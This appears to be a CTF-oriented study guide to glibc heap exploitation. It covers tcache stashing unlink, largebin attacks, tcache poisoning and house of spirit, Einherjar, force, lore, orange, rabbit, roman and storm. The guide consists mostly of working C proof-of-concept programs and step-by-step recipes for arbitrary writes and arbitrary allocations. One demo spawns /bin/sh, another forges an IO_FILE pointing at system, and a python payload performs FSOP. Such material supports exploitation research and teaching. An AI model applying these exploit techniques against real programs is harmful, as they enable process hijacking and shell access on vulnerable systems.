  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      && tcache != NULL
      && tcache->counts[tc_idx] > 0)
    {
      victim = tcache_get (tc_idx);
      return tag_new_usable (victim);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

  if (SINGLE_THREAD_P)
    {
      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
              &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

  arena_get (ar_ptr, bytes);

  victim = _int_malloc (ar_ptr, bytes);
  /* Retry with another arena only if we were able to find a usable arena
     before. */
  if (!victim && ar_ptr != NULL)
    {
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }
  ...

Here malloc serves the request from the tcache (tcache_get) before _int_malloc is ever called.

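Of course, several unsortedbin chunks do not have to end up in the smallbin. With the libc and heap base known, a single chunk can be freed into the smallbin and several fake smallbin chunks forged inside it. This has an extra benefit: once they are stashed into the tcache, their fd pointers can be edited for arbitrary-address allocations.

The fake chunks forged inside the chunk that is already in the smallbin are set up as follows:

chunk1 | chunk2 | ... | chunk(n-1) | chunkn (assuming chunk1 is already on the 0xk0 smallbin list)
prev_size: all 0
size: all identical, 0xk1
fd: chunkn -> chunk(n-1), chunk(n-1) -> chunk(n-2), ..., chunk2 -> chunk1, chunk1 -> chunk1
bk: chunk1 -> chunk2, chunk2 -> chunk3, ..., chunk(n-1) -> chunkn, chunkn -> the matching main_arena->bins entry (the original, uncorrupted bk value)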

This makes tcache allocations easy to control:
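The layout above can be generated by a loop instead of writing every word by hand. A sketch with a hypothetical helper: `mem` is chunk1's user pointer, fake chunks are assumed to be 0x20 apart, and chunk1's own header is left untouched because it is the real chunk already in the bin. With n = 7 it writes the same words as the arr[7][0..25] assignments in the program below (which uses 0x110 as the size).

```c
#include <assert.h>
#include <stdint.h>

/* Forges n chunks (chunk1 real, chunk2..chunkn fake) inside chunk1's user
   data. Chunk k+1 has its header at chunk1's header + 0x20*k; its fd/bk are
   mem[4k] / mem[4k+1] and, for k > 0, prev_size/size are mem[4k-2] / mem[4k-1].
   mem must have room for 4*n-2 words. */
void forge_smallbin_chain(uint64_t *mem, int n, uint64_t size_field,
                          uint64_t arena_bk) {
    uint64_t hdr1 = (uint64_t)(uintptr_t)mem - 0x10;       /* chunk1 header */
    for (int k = 0; k < n; k++) {
        uint64_t hdr = hdr1 + 0x20 * (uint64_t)k;
        if (k > 0) {
            mem[4 * k - 2] = 0;                            /* prev_size */
            mem[4 * k - 1] = size_field;                   /* size */
        }
        mem[4 * k] = (k == 0) ? hdr1 : hdr - 0x20;         /* fd: previous chunk */
        mem[4 * k + 1] = (k == n - 1) ? arena_bk : hdr + 0x20; /* bk: next chunk */
    }
}
```

Only the last bk keeps the original main_arena value, so the stashing loop walks chunk2..chunkn and then stops at the bin.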

smallbins
0x110 [corrupted]
FD: 0x555555559ae0 ◂— 0x555555559ae0
BK: 0x555555559ae0 —▸ 0x555555559b00 —▸ 0x555555559b20 —▸ 0x555555559b40 —▸ 0x555555559b60 ◂— ...

->

tcachebins
0x110 [ 6]: 0x555555559bb0 —▸ 0x555555559b90 —▸ 0x555555559b70 —▸ 0x555555559b50 —▸ 0x555555559b30 —▸ 0x555555559b10 ◂— 0

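At this point the chunk at 0x555555559ae0 has been handed back to us, so the fd pointer at 0x555555559bb0 can easily be overwritten for an arbitrary-address allocation (house of minho).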

#include <stdio.h>
#include <stdlib.h>

long long *arr[24];

int main() {
    for(int i=0; i<8; i++){
        arr[i] = (long long*) malloc(0x100);       // 0x110 chunks
        long long *p = (long long*) malloc(0x10);  // guard, prevents consolidation
    }
    for(int i=0; i<8; i++){
        free(arr[i]);                              // arr[0..6] fill the tcache, arr[7] -> unsortedbin
    }
    long long *p = (long long*) malloc(0x110);     // sorts arr[7] into the 0x110 smallbin
    long long arena_bk = arr[7][1];                // original bk: the bin in main_arena
    // chunk1 = arr[7]-0x10 (real); 6 fake chunks at arr[7]+0x10, +0x30, ..., +0xb0
    arr[7][0]=(long long)arr[7]-0x10;
    arr[7][1]=(long long)arr[7]+0x10;
    arr[7][2]=0;
    arr[7][3]=0x110;
    arr[7][4]=(long long)arr[7]-0x10;
    arr[7][5]=(long long)arr[7]+0x30;
    arr[7][6]=0;
    arr[7][7]=0x110;
    arr[7][8]=(long long)arr[7]+0x10;
    arr[7][9]=(long long)arr[7]+0x50;
    arr[7][10]=0;
    arr[7][11]=0x110;
    arr[7][12]=(long long)arr[7]+0x30;
    arr[7][13]=(long long)arr[7]+0x70;
    arr[7][14]=0;
    arr[7][15]=0x110;
    arr[7][16]=(long long)arr[7]+0x50;
    arr[7][17]=(long long)arr[7]+0x90;
    arr[7][18]=0;
    arr[7][19]=0x110;
    arr[7][20]=(long long)arr[7]+0x70;
    arr[7][21]=(long long)arr[7]+0xb0;
    arr[7][22]=0;
    arr[7][23]=0x110;
    arr[7][24]=(long long)arr[7]+0x90;
    arr[7][25]=arena_bk;
    for(int i=0; i<8; i++){
        // 7 from the tcache; the 8th takes chunk1 from the smallbin and stashes the 6 fake chunks
        arr[i] = (long long*) malloc(0x100);
    }
    return 0;
}
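  • Writing a libc address to an arbitrary address
    • First leak a heap address
    • Then leave only 6 chunks in the tcachebin, so that once one smallbin chunk is stashed the tcachebin is full, which stops the loop from following our forged bk any further
    • Then get at least two chunks into the smallbin (either by splitting an unsorted chunk so that the remainder lands in the smallbin, or by letting the unsorted-bin scan sort small chunks into the smallbin)
    • Using an overflow or UAF+edit, set the bk pointer of the head chunk of the smallbin list to target_addr-0x10
    • Do not corrupt the fd pointer when forging bk
    • Finally, request a chunk of that smallbin's size: the tail chunk of the smallbin is returned and the head chunk is moved into the tcachebin, and the tcache stashing unlink attack fires while it is being linked in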
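#include <stdio.h>
#include <stdlib.h>

long long *arr[24];

int main() {
    for(int i=0; i<9; i++){
        arr[i] = (long long*) malloc(0x100);
        long long *p = (long long*) malloc(0x10);  // guard
    }
    for(int i=0; i<9; i++){
        free(arr[i]);                              // 7 fill the tcache, arr[7] and arr[8] -> unsortedbin
    }
    long long target = 0;
    long long *p = (long long*) malloc(0x110);     // sorts both into the smallbin; arr[8] is the head

    arr[8][1]=(long long)&target-0x10;             // head's bk = &target-0x10, fd left intact
    arr[0] = (long long*) malloc(0x100);           // leaves 6 chunks in the tcache
    arr[7] = (long long*) calloc(1,0x100);         // skips the tcache; stashing arr[8] writes the bin address to target
    if(target > 0x700000000000){
        puts("[+] success");
        printf("target: 0x%llx\n", target);
        system("/bin/sh");
    }
    return 0;
}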
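  • Arbitrary-address allocation
    • First leak a heap address
    • Then leave only 5 chunks in the tcachebin
    • Then get two chunks into the smallbin
    • Using an overflow or UAF+edit, set the bk pointer of the smallbin's head chunk to fake_chunk_addr-0x10, near the address we want to allocate, and then set fake_chunk_bk=target_addr-0x10
    • Do not corrupt the fd pointer when forging bk
    • Finally, request a chunk of that smallbin's size; the tcache stashing unlink attack fires while the chunks are linked into the tcachebin, giving one allocation at the fake chunk plus one arbitrary write of a libc address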

Note the smallbin state before the calloc:

smallbins
0x...0 [corrupted]
FD: chunk1 —▸ chunk2 —▸ main_arena+xxx ◂— chunk1
BK: chunk2 —▸ chunk1 —▸ target_addr —▸ writable_addr ◂— xxx

The bk of the chunk we want to allocate must point to writable memory: after the calloc, writable_addr->fd is overwritten with main_arena+xxx.

#include <stdio.h>
#include <stdlib.h>

long long *arr[24];

int main() {
    for(int i=0; i<9; i++){
        arr[i] = (long long*) malloc(0x200);
        long long *p = (long long*) malloc(0x10);  // guard
    }
    for(int i=0; i<9; i++){
        free(arr[i]);
    }
    long long target = 0;
    long long *p = (long long*) malloc(0x210);     // arr[7], arr[8] -> 0x210 smallbin
    long long libc=arr[7][0]+0x810;                // arr[7][0] (the tail's fd) is the bin address in main_arena
    arr[8][1]=libc;                                // head's bk -> fake chunk in libc
    arr[0] = (long long*) malloc(0x200);
    arr[1] = (long long*) malloc(0x200);           // leaves 5 chunks in the tcache
    arr[7] = (long long*) calloc(1,0x200);         // stashes arr[8] and the fake chunk
    arr[7] = (long long*) malloc(0x200);           // returns the fake chunk from the tcache

    arr[7][0x10]=(long long)0x3b687320; // " sh;"
    arr[7][0x10+5]=libc-0x1728dc; // system
    arr[7][0x10+17]=(long long)arr[0]+0x20; // prot:w
    arr[7][0x10+1]=(long long)arr[7]+0x70;
    arr[7][0x10+20]=(long long)arr[7]+0x40;
    arr[7][0x10+27]=libc-0x22c8-0x20; // _IO_wfile_jumps
    puts("failed");
    return 0;
}

largebin attack

Different sizes go to different largebin lists (x86-64):

size range          index
[0x400, 0x440)      64
[0x440, 0x480)      65
[0x480, 0x4C0)      66
[0x4C0, 0x500)      67
[0x500, 0x540)      68
... (step 0x40)
[0xC00, 0xC40)      96
[0xC40, 0xE00)      97
[0xE00, 0x1000)     98
[0x1000, 0x1200)    99
[0x1200, 0x1400)    100
[0x1400, 0x1600)    101
... (step 0x200)
[0x2800, 0x2A00)    111
[0x2A00, 0x3000)    112
[0x3000, 0x4000)    113
[0x4000, 0x5000)    114
... (step 0x1000)
[0x9000, 0xA000)    119
[0xA000, 0x10000)   120
[0x10000, 0x18000)  121
[0x18000, 0x20000)  122
[0x20000, 0x28000)  123
[0x28000, 0x40000)  124
[0x40000, 0x80000)  125
[0x80000, …)        126
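The table is glibc's largebin_index_64 macro (the one used on 64-bit builds) unrolled. A transcription as a function, meaningful only for chunk sizes of at least 0x400 (smaller sizes belong to the smallbins):

```c
#include <assert.h>

/* glibc's largebin_index_64 written as a function; sz is the chunk size. */
unsigned largebin_index_64(unsigned long sz) {
    if ((sz >> 6) <= 48)  return 48 + (unsigned)(sz >> 6);   /* 0x40 steps   */
    if ((sz >> 9) <= 20)  return 91 + (unsigned)(sz >> 9);   /* 0x200 steps  */
    if ((sz >> 12) <= 10) return 110 + (unsigned)(sz >> 12); /* 0x1000 steps */
    if ((sz >> 15) <= 4)  return 119 + (unsigned)(sz >> 15); /* 0x8000 steps */
    if ((sz >> 18) <= 2)  return 124 + (unsigned)(sz >> 18);
    return 126;
}
```

The irregular ranges such as [0xC40, 0xE00) fall out of the switch between shift widths: 0xC00 is the last size handled by the >> 6 branch.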

2.31+

In glibc 2.39, the code that takes a chunk from the unsortedbin and places it into its bin is:

/* place chunk in bin */

if (in_smallbin_range (size))
  {
    victim_index = smallbin_index (size);
    bck = bin_at (av, victim_index);
    fwd = bck->fd;
  }
else
  {
    victim_index = largebin_index (size);
    bck = bin_at (av, victim_index);
    fwd = bck->fd;

    /* maintain large bins in sorted order */
    if (fwd != bck)
      {
        /* Or with inuse bit to speed comparisons */
        size |= PREV_INUSE;
        /* if smaller than smallest, bypass loop below */
        assert (chunk_main_arena (bck->bk));
        if ((unsigned long) (size)
            < (unsigned long) chunksize_nomask (bck->bk))
          {
            fwd = bck;
            bck = bck->bk;

            victim->fd_nextsize = fwd->fd;
            victim->bk_nextsize = fwd->fd->bk_nextsize;
            fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
          }
        else
          {
            assert (chunk_main_arena (fwd));
            while ((unsigned long) size < chunksize_nomask (fwd))
              {
                fwd = fwd->fd_nextsize;
                assert (chunk_main_arena (fwd));
              }

            if ((unsigned long) size
                == (unsigned long) chunksize_nomask (fwd))
              /* Always insert in the second position. */
              fwd = fwd->fd;
            else
              {
                victim->fd_nextsize = fwd;
                victim->bk_nextsize = fwd->bk_nextsize;
                if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
                  malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
                fwd->bk_nextsize = victim;
                victim->bk_nextsize->fd_nextsize = victim;
              }
            bck = fwd->bk;
            if (bck->fd != fwd)
              malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
          }
      }
    else
      victim->fd_nextsize = victim->bk_nextsize = victim;
  }

The weakness is in this branch:

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk))
  {
    fwd = bck;
    bck = bck->bk;

    victim->fd_nextsize = fwd->fd;
    victim->bk_nextsize = fwd->fd->bk_nextsize;
    fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
  }

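When the incoming chunk is smaller than the smallest chunk in the bin, this branch runs without any integrity check, so the following two lines execute unchecked: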

victim->bk_nextsize = fwd->fd->bk_nextsize;
victim->bk_nextsize->fd_nextsize = victim;

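In other words, if we can set the bk_nextsize of the largest chunk in the bin to an address A, inserting a smaller chunk writes a heap address (the inserted chunk's header) to A->fd_nextsize, i.e. to A+0x20.

A minimal demonstration: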
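The unchecked write in isolation, as a toy model: chunk headers are arrays of x86-64 words, `insert_smallest` (a hypothetical name) only performs the nextsize updates of the branch above, and `largest` plays fwd->fd. `fake_a` stands for A; in the demonstration below A is &target - 4 words, so A+0x20 is target itself.

```c
#include <assert.h>
#include <stdint.h>

/* Word offsets of a chunk header on x86-64. */
enum { PREV_SIZE, SIZE, FD, BK, FD_NEXTSIZE, BK_NEXTSIZE, CHUNK_WORDS };

/* Nextsize updates of the "smaller than the smallest" branch. */
void insert_smallest(uint64_t *largest, uint64_t *victim) {
    uint64_t v = (uint64_t)(uintptr_t)victim;
    victim[FD_NEXTSIZE] = (uint64_t)(uintptr_t)largest;      /* fwd->fd */
    victim[BK_NEXTSIZE] = largest[BK_NEXTSIZE];              /* taken on trust */
    uint64_t *a = (uint64_t *)(uintptr_t)victim[BK_NEXTSIZE];
    a[FD_NEXTSIZE] = v;                                      /* write to A+0x20 */
    largest[BK_NEXTSIZE] = v;
}
```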

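#include <assert.h>
#include <stdlib.h>

int main(void) {
    size_t target = 0;

    size_t *p1 = malloc(0x428);       // 0x430 chunk, too big for the tcache
    size_t *g1 = malloc(0x18);        // guard
    size_t *p2 = malloc(0x418);       // 0x420 chunk: same largebin as p1, but smaller
    size_t *g2 = malloc(0x18);        // guard

    free(p1);
    size_t *g3 = malloc(0x438);       // sorts p1 into the largebin
    free(p2);                         // p2 -> unsortedbin
    p1[3] = (size_t)((&target)-4);    // p1->bk_nextsize = &target - 0x20
    size_t *g4 = malloc(0x438);       // sorting p2 into the largebin writes p2's header to target

    assert((size_t)(p2-2) == target);
    return 0;
}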

tcache poisoning

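On newer glibc the tcache plays the role the fastbin used to: it has fewer checks than the other bins and is the easiest to exploit.

Overwrite the fd pointer of a chunk (the attack chunk) sitting in the tcachebin so that it points to the address we want to control; allocating chunks of the attack chunk's size then returns the attack chunk and, right after it, the target address. From 2.32 on, the pointer is protected by safe-linking (XOR), so the value written must be mangled the same way.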
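The value to write, as a sketch (helper names are hypothetical, x86-64 assumed). `chunk_mem` is the user pointer of the poisoned chunk, which is also the address of its next field. Two extra constraints worth keeping in mind: since 2.32 tcache_get rejects a target that is not 16-byte aligned ("malloc(): unaligned tcache chunk detected"), and on recent versions the tcache count for that size must still be non-zero when the target is requested, so usually two chunks are freed first.

```c
#include <assert.h>
#include <stdint.h>

/* Value for the next/fd field of a freed tcache chunk so that the allocation
   after it returns `target`. Before 2.32 (no safe-linking) it is target itself. */
uint64_t tcache_poison_value(uint64_t chunk_mem, uint64_t target, int safe_linking) {
    return safe_linking ? ((chunk_mem >> 12) ^ target) : target;
}

/* Since 2.32 the target must be 16-byte aligned. */
int tcache_target_aligned(uint64_t target) {
    return (target & 0xf) == 0;
}
```

glibc undoes the mangling with REVEAL_PTR using the same chunk address, so XORing the written value with chunk_mem >> 12 has to give back the target.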

heap overlap

This one is open-ended; how to get overlapping chunks depends on the challenge.

house of spirit

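  • Versions: 2.23~
  • Goal: arbitrary write to a chosen memory region
  • Method: forge a chunk in that memory and free it, so memory that was never a chunk ends up in a bin; the next malloc of that size returns it, giving an arbitrary write
  • Forged structure:
    • fake_chunk
      • prev_size: no constraint
      • size
        • N->0
        • M->0
        • P->0
        • the address of prev_size (the chunk start) is 16-byte aligned (64-bit)
        • size<0x80
        • size is 16-byte aligned (64-bit)
      • fd, bk, data: no constraint
    • next_chunk
      • prev_size: no constraint
      • size<128KB
      • size is 16-byte aligned (64-bit)
  • Prerequisites
    • control over the address passed to free, e.g. via an overflow
  • Notes
    • Mind any counters in the challenge.
    • If there are several places to forge the chunk, pick the one that is useful for later steps.
    • Get both the fake chunk's size and the next chunk's size right.
    • Mind the program logic as well: if the program keeps freeing after fake_chunk has been freed, things may break; in that case write suitable data into fake_chunk to get past that logic.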
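The two size fields can be laid out like this. A sketch only: the buffer, the helper name and the values are assumptions, and the free() itself is left out because it only makes sense against a real heap. The fake chunk starts at buf[0], so its user pointer (what gets freed) is &buf[2], and the next chunk's size sits at byte offset size + 8.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: writes the fake chunk's size and the next chunk's size
   into a 16-byte aligned buffer and returns the pointer to pass to free(). */
void *spirit_layout(uint64_t *buf, uint64_t size, uint64_t next_size) {
    buf[1] = size;                  /* fake size, N/M/P bits clear */
    buf[size / 8 + 1] = next_size;  /* size field of next_chunk */
    return &buf[2];
}
```

With size 0x40 the next size lands in buf[9]; the buffer must be declared 16-byte aligned (e.g. with _Alignas(16)) so that the returned pointer is too.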

house of Einherjar

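  • Versions: 2.23~
  • Goal: arbitrary write to a chosen memory region
  • Method: forge a chunk in that memory and use an off-by-one to make a real chunk consolidate backward into it, so the resulting free chunk starts at the fake chunk; the next malloc returns memory at the fake chunk, giving an arbitrary write there
  • Forged structure:
    • fake_chunk
      • prev_size = chunk1_size
      • size
        • N->0
        • M->0
        • P->0
        • the address of prev_size (the chunk start) is 16-byte aligned (64-bit)
        • size = chunk1_addr-fake_chunk_addr (on newer glibc it must equal chunk1's prev_size to pass the size vs. prev_size checks)
      • fd, bk, fd_nextsize, bk_nextsize = fake_chunk_prev_size_addr
    • chunk0
    • chunk1
      • prev_size = chunk1_addr-fake_chunk_addr
      • N->0
      • M->0
      • P->0
      • size is a multiple of 0x100 (size = 0 is also allowed)
  • Prerequisites
    • off-by-one or off-by-null
    • the heap address and the fake chunk address are known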
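The arithmetic behind these fields, as a sketch assuming x86-64 and a chunk1 that bypasses the tcache when freed (size above the tcache range, or that tcache size already full). The struct and helper are hypothetical; the fake size is set equal to chunk1's prev_size, which is what the size vs. prev_size checks in newer glibc require, and the self-pointing fd/bk pass p->fd->bk == p and p->bk->fd == p.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint64_t chunk1_prev_size;  /* written into chunk1's prev_size */
    uint64_t fake_size;         /* fake chunk size, equal to the above */
    uint64_t fake_fd, fake_bk;  /* self-pointers */
    uint64_t merged_size;       /* free chunk after backward consolidation */
} einherjar_values;

/* fake_hdr: fake chunk header; chunk1_hdr: header of the chunk whose
   PREV_INUSE bit the off-by-null clears; chunk1_size: its size. */
einherjar_values einherjar(uint64_t fake_hdr, uint64_t chunk1_hdr, uint64_t chunk1_size) {
    einherjar_values v;
    v.chunk1_prev_size = chunk1_hdr - fake_hdr;
    v.fake_size = v.chunk1_prev_size;
    v.fake_fd = v.fake_bk = fake_hdr;
    v.merged_size = v.chunk1_prev_size + chunk1_size;  /* before any merge with the next chunk or top */
    return v;
}
```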

house of force

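  • Versions: 2.23~2.29
  • Goal: arbitrary write to a chosen memory region
  • Method: set the top chunk's size to a huge value, then request a (possibly huge) chunk spanning from the heap up to the target, which moves the top chunk pointer to the target; the next malloc returns memory at the target, giving an arbitrary write there
  • Steps:
    • overflow into the top chunk and set its size to -1
    • request a chunk of a specific size (it may be negative)
      • req=dest - old_top_prev_size_addr - 4*sizeof(long)
    • the next request returns memory at dest
  • Prerequisites
    • a heap overflow that reaches the top chunk's size
    • the heap address and the destination address are known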
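Checking the request formula numerically. A sketch assuming x86-64 (SIZE_SZ = 8, 16-byte alignment), a dest - old_top that is a multiple of 16, and a request that passes glibc's out-of-range check (which only rejects values within 2*MINSIZE of 2^64); request2size below is transcribed from glibc without that check, and the other names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define SIZE_SZ 8ULL
#define MALLOC_ALIGN_MASK 0xfULL
#define MINSIZE 0x20ULL

/* glibc's request2size on x86-64 (unsigned arithmetic wraps like glibc's). */
uint64_t request2size(uint64_t req) {
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)
               ? MINSIZE
               : (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK;
}

/* old_top: top chunk header address; dest: address the next malloc should return. */
uint64_t force_request(uint64_t old_top, uint64_t dest) {
    return dest - old_top - 4 * sizeof(long);
}
```

After malloc(req) the top chunk header moves to old_top + request2size(req), and the next malloc returns that address + 0x10, which is dest; a target below the heap simply makes req wrap around to a huge unsigned value.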

house of lore

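  • Versions: 2.23~2.31

  • Goal: arbitrary write to a chosen memory region

  • Method: forge a fake chunk and a helper chunk in the target memory, use a UAF to overwrite the bk of a smallbin chunk so that fake_chunk gets linked into the smallbin; after that smallbin chunk has been allocated, the next malloc returns the fake chunk, giving an arbitrary write there

  • Forged structure:

    • fake_chunk_1
      • fd = small_chunk_1_prev_size_addr
      • bk = fake_chunk_2_prev_size_addr
    • fake_chunk_2
      • fd = fake_chunk_1_prev_size_addr
  • Steps:

    • Allocate a smallbin-sized chunk (victim) and forge fake_chunk_1 and fake_chunk_2
    • Free victim and allocate a larger chunk (so victim is sorted into the smallbin), then set victim->bk to fake_chunk_1_prev_size_addr
    • Allocate a chunk of victim's size: victim is returned and fake_chunk_1 is linked into the smallbin (smallbin->bk = victim->bk = stack_buffer1_addr, i.e. fake_chunk_1)
    • Allocate one more chunk of victim's size to get fake_chunk_1
  • Prerequisites

    • UAF
    • the heap address (and possibly other addresses) must be known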
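A toy model of the two checked smallbin removals the fake chain has to survive. It leaves the tcache out (pre-2.26 behaviour; on 2.26+ the stashing loop in the same code path also runs), `lchunk`, `smallbin_take` and `lore_setup` are hypothetical names, and each pointer stands for a chunk header address (the *_prev_size_addr values above).

```c
#include <assert.h>
#include <stddef.h>

typedef struct lchunk {
    struct lchunk *fd;
    struct lchunk *bk;
} lchunk;

/* Checked removal from the smallbin tail, as in _int_malloc (no tcache). */
lchunk *smallbin_take(lchunk *bin) {
    lchunk *victim = bin->bk;
    if (victim == bin)
        return NULL;
    lchunk *bck = victim->bk;
    if (bck->fd != victim)              /* "smallbin double linked list corrupted" */
        return NULL;
    bin->bk = bck;
    bck->fd = bin;
    return victim;
}

/* Wires fake_chunk_1 / fake_chunk_2 as listed above and redirects victim->bk. */
void lore_setup(lchunk *victim, lchunk *fake1, lchunk *fake2) {
    fake1->fd = victim;                 /* passes the check on the 1st take */
    fake1->bk = fake2;
    fake2->fd = fake1;                  /* passes the check on the 2nd take */
    victim->bk = fake1;                 /* the UAF write */
}
```

The first take returns victim and leaves fake_chunk_1 as the tail; the second returns fake_chunk_1, which is why fake_chunk_2 only needs a valid fd.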

house of orange

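  • Versions: 2.23~2.26
  • Effect: arbitrary function/command execution
  • Feature: no free needed
  • Process:
    • First tamper with the top chunk's size, e.g. via an overflow
    • Then request a chunk larger than the (forged) top chunk size
    • sysmalloc then frees the old top chunk into the unsortedbin
  • Constraints on the forged top chunk:
    • nb is the requested chunk size
    • MINSIZE<old_top_size<nb+MINSIZE
    • the PREV_INUSE bit of old_top_size is 1
    • (old_top_size+old_top)&0xfff=0x000
    • nb<0x20000
  • unsortedbin attack
    • Writes a large value (main_arena+88 or main_arena+96) to a chosen address
    • How:
      • set the bk pointer of the unsortedbin's tail chunk to target_addr-0x10
    • Once the unsortedbin attack is done, the unsortedbin can no longer serve allocations
  • FSOP
    • Principle:
      • Overwrite _IO_list_all and _chain to hijack the IO_FILE list so that an IO_FILE lands in memory we control. FSOP relies on _IO_flush_all_lockp, which flushes every stream on the _IO_list_all list (effectively an fflush on each), and that flush ends up calling _IO_overflow from the vtable
      • Since the IO_FILE is in memory we control, we also control its vtable: point the _IO_overflow entry at system. Its first argument is the address of the IO_FILE itself, so setting the IO_FILE's flags field to the string /bin/sh gives a shell once _IO_flush_all_lockp runs, which happens on exit, when libc aborts, or when main returns
    • Layout
      • Overwrite _IO_list_all with main_arena+88. The _chain field is at offset 0x68 of the structure, so the next IO_FILE is taken from main_arena+88+0x68, which is exactly the 0x60 smallbin's slot in the bins array
      • Put a chunk into this 0x60 smallbin; once _IO_list_all points to main_arena+88, that smallbin chunk is treated as the next IO_FILE structure
      • Since that chunk's memory is under our control, we can forge its vtable field and the rest of the layout to finally get a shell
    • Checks to bypass
      • mode=0
      • _IO_write_ptr=1
      • _IO_write_base=0
      • _flag=/bin/sh
    • The success rate is only about 50%
    • glibc 2.24 added a vtable check, which can be bypassed by using _IO_str_jumps
    • The unsortedbin attack and FSOP data are all built into a single payload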
payload=b'f'*0x400
payload+=p64(0)+p64(0x21)
payload+=p64(sys_addr)+p64(0)
payload+=b'/bin/sh\x00'+p64(0x61) #old top chunk prev_size & size; prev_size is also the fake FILE's _flags field
payload+=p64(0)+p64(io_list_all-0x10) #old top chunk fd & bk
payload+=p64(0)+p64(1)#_IO_write_base & _IO_write_ptr
payload+=p64(0)*7
payload+=p64(leak_heap+0x430)#chain->old top chunk addr
payload+=p64(0)*13
payload+=p64(leak_heap+0x508)#vtable
payload+=p64(0)+p64(0)+p64(sys_addr)#DUMMY finish overflow

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
     || (_IO_vtable_offset (fp) == 0
         && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                              > fp->_wide_data->_IO_write_base))
     )
    && _IO_OVERFLOW (fp, EOF) == EOF)
  result = EOF;
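The forged-top constraints listed for house of orange, written as one predicate. A sketch with a hypothetical helper, assuming x86-64, 4 KiB pages and the default 128 KiB mmap threshold; it mirrors what sysmalloc asserts about the old top (which only needs size >= MINSIZE) plus the two conditions that make malloc reach sysmalloc and extend the heap with brk.

```c
#include <assert.h>
#include <stdint.h>

#define MINSIZE 0x20ULL
#define PAGE_MASK 0xfffULL
#define MMAP_THRESHOLD 0x20000ULL   /* default mp_.mmap_threshold */

/* old_top: top chunk header address; size_field: raw size word incl. flags;
   nb: normalized request size. Returns 1 if the old top would be freed. */
int orange_top_ok(uint64_t old_top, uint64_t size_field, uint64_t nb) {
    uint64_t size = size_field & ~0x7ULL;
    return size >= MINSIZE                       /* sysmalloc: size >= MINSIZE */
        && (size_field & 1)                      /* PREV_INUSE set */
        && ((old_top + size) & PAGE_MASK) == 0   /* old top ends on a page boundary */
        && size < nb + MINSIZE                   /* top cannot serve the request */
        && nb < MMAP_THRESHOLD;                  /* extend via brk, not mmap */
}
```

For a top chunk at 0x55555555bc20, a forged size of 0x3e1 keeps the end at 0x55555555c000 and works with nb = 0x1000; clearing PREV_INUSE, breaking the page alignment, or requesting too little all fail.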

house of rabbit

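  • Versions: 2.23~2.31
  • Goal: arbitrary write to a chosen memory region
  • Core idea: use fastbin consolidation (malloc_consolidate) to legitimize a fake chunk sitting in a fastbin
  • Method:
    • Via fd overwrite
      • Allocate chunk A (fastbin size) and chunk B (smallbin size)
      • Free chunk A and set A->fd to address X
      • Free chunk B so that the fake chunk is put into the unsortedbin
      • Allocate a large enough chunk (or do anything else that triggers malloc_consolidate) so that the fake chunk moves into the matching smallbin/largebin
      • Allocate the fake chunk and read/write it
    • Via overlapping chunks
  • Prerequisites
    • UAF
    • the fd or size field of a fastbin chunk is writable
    • allocations larger than 0x400 are possible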

house of roman

  • Versions: 2.23~2.29
  • Goal: get a shell
  • Method:
    • Step 1
      • Set up chunks
        • chunk_0, size=0x70
          • fastbin_victim
          • UAF
        • chunk_1, size=0x90
          • makes chunk_2 page-aligned
        • chunk_2, size=0x90
          • main_arena_use
          • unsortedbin
        • chunk_3, size=0x70
          • relative_offset_heap
          • used to write a relative address
      • free(chunk_2)
      • malloc(0x60)
        • chunk_2->chunk_2_1(0x70,fake_libc_chunk)+chunk_2_2(0x20,leftover_main,unsortedbin)
      • free(chunk_3)+free(chunk_0), both go to the fastbin
      • edit(chunk_0->fd=fake_libc_chunk_prev_size_addr)
      • edit(fake_libc_chunk->fd=__malloc_hook-0x23)
        • brute-forced
      • malloc(0x60)*3
    • Step 2
      • malloc(chunk_4,size=0x90)+malloc(0x30)
      • free(chunk_4)
      • edit(chunk_4->bk=__malloc_hook-0x10)
      • malloc(malloc_hook_chunk,size=0x90)
      • edit(malloc_hook_chunk->fd=ogg_addr)
  • Prerequisites
    • UAF
    • no address leak needed
    • brute-forces 16 bits, 1/40960

house of storm

  • Versions: 2.23~2.29
  • Goal: arbitrary address write
  • Forged structures
    • unsorted_bin->fd = 0
    • unsorted_bin->bk = fake_chunk
    • large_bin->fd = 0
    • large_bin->bk = fake_chunk+8
    • large_bin->fd_nextsize = 0
    • large_bin->bk_nextsize = fake_chunk - 0x18 -5
  • Method:
    • chunk_1, size=0x410
    • chunk_2, size=0x30
    • chunk_3, size=0x420
    • chunk_4, size=0x30
    • chunk_5, size=0x30
    • chunk_6, size=0x30
    • free(chunk_1)+free(chunk_3)+free(chunk_5)
    • malloc(chunk_5)
    • malloc(chunk_3)+free(chunk_3)
    • edit(chunk_3->bk=__malloc_hook-0x50)
    • edit(chunk_1->bk=__malloc_hook-0x50+8)
    • edit(chunk_1->bk_nextsize=__malloc_hook-0x50-0x18-5)
    • malloc(0x48)(__malloc_hook_chunk)
    • edit(__malloc_hook_chunk+0x40=ogg_addr)
    • malloc->getshell
  • Prerequisites
    • UAF
    • unsortedbin attack and largebin attack
